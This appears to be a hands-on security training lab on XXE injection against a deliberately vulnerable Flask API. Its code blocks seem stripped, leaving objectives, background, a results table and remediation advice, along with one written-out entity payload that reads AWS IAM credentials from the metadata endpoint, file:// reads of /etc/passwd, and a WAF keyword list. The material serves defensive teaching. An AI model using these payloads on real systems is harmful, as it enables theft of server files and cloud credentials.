Lab 15: XXE Injection

Objective

Exploit XML External Entity (XXE) injection vulnerabilities against a live XML-processing API from Kali Linux:

  1. Classic XXE — inject a SYSTEM entity to read /etc/passwd via the file:// scheme

  2. Credential exfiltration — use XXE to read internal config files with DB passwords and AWS keys

  3. Multi-endpoint XXE — exploit the same vulnerability across three different API endpoints

  4. XXE via order API — exfiltrate data through a product field reflected in the response

  5. XXE via search API — exfiltrate data through search results

  6. Audit and remediation — identify safe vs vulnerable XML parsers and implement defences

All attacks run from Kali against a live Flask API — real file reads returned in real HTTP responses.


Background

XXE (XML External Entity) injection has been in the OWASP Top 10 since 2017. It occurs when an XML parser processes external entity declarations, allowing an attacker to reference files, internal URLs, or other resources from the server's perspective.

Real-world examples:

  • 2021 GitLab (CVE-2021-22205) — ExifTool parsed uploaded image metadata as XML; XXE led to unauthenticated RCE. CVSS 10.0. Over 50,000 servers exposed.

  • 2019 Facebook (Bug Bounty) — XXE in a Word document parser allowed reading internal AWS metadata credentials — the same 169.254.169.254 SSRF chain from Lab 10.

  • 2018 Uber (HackerOne) — XXE in a SAML authentication endpoint (SAML uses XML); researchers read internal files and proved server-side file read.

  • XXE + SSRF combo<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role"> — reads AWS IAM credentials, exactly like Lab 10 but triggered via XML instead of a URL parameter.

OWASP coverage: A05:2021 (Security Misconfiguration — insecure XML parser config)


Architecture

Time

40 minutes

Tools

Tool
Container
Purpose

curl

Kali

Send XML payloads to all three API endpoints

python3

Kali

Automate XXE payload variations

nmap

Kali

Service fingerprinting

gobuster

Kali

Enumerate XML endpoints


Lab Instructions

Step 1: Environment Setup — Launch the Vulnerable XML API

📸 Verified Output:


Step 2: Launch the Kali Attacker Container

📸 Verified Output:


Step 3: Normal XML Usage — Baseline

📸 Verified Output:


Step 4: Classic XXE — Read /etc/passwd

📸 Verified Output:

💡 The <!DOCTYPE> declaration tells the XML parser to load external content. SYSTEM "file:///etc/passwd" is a URI telling the parser to read a local file. The parser fetches the file, substitutes the contents everywhere &xxe; appears, and includes it in the response. The fix: disable DOCTYPE processing entirely — no legitimate use case requires the parser to load external files.


Step 5: XXE — Read Internal Configuration Secrets

📸 Verified Output:


Step 6: XXE via Order Endpoint

📸 Verified Output:

💡 XXE doesn't require a dedicated XML parse endpoint. Any endpoint that accepts XML — order APIs, SAML assertions, RSS feed parsers, Office document uploads, SVG renderers — is potentially vulnerable. The attacker finds where file content gets reflected in the response and routes their XXE payload through that field.


Step 7: XXE via Search Endpoint + Automated Enumeration

📸 Verified Output:


Step 8: Cleanup


Attack Summary

Phase
Target File
Endpoint Used
Data Exfiltrated

1

/etc/passwd

/api/xml/parse

All OS user accounts

2

/tmp/xxe_secrets/config.txt

/api/xml/parse

DB password, AWS key, JWT secret

2

/tmp/xxe_secrets/users.txt

/api/xml/parse

Plaintext credentials

3

/tmp/xxe_secrets/config.txt

/api/xml/order

Secrets via product field

4

/tmp/xxe_secrets/users.txt

/api/xml/search

Credentials via results field

5

Multiple

Automated

/proc, source code, all secrets


Remediation

Python — Disable external entities (safe by default in xml.etree.ElementTree)

Python — Using lxml (vulnerable by default — must configure)

General Defences

Defence
What it blocks

Disable DOCTYPE / external entities

Classic XXE, SSRF via XML

Use defusedxml in Python

All XXE variants

Validate XML schema (XSD) before parsing

Unexpected structures

Never reflect raw XML field values in responses

Limits exfiltration even if XXE works

WAF rules for <!ENTITY, SYSTEM, PUBLIC

Perimeter filter

Further Reading

Last updated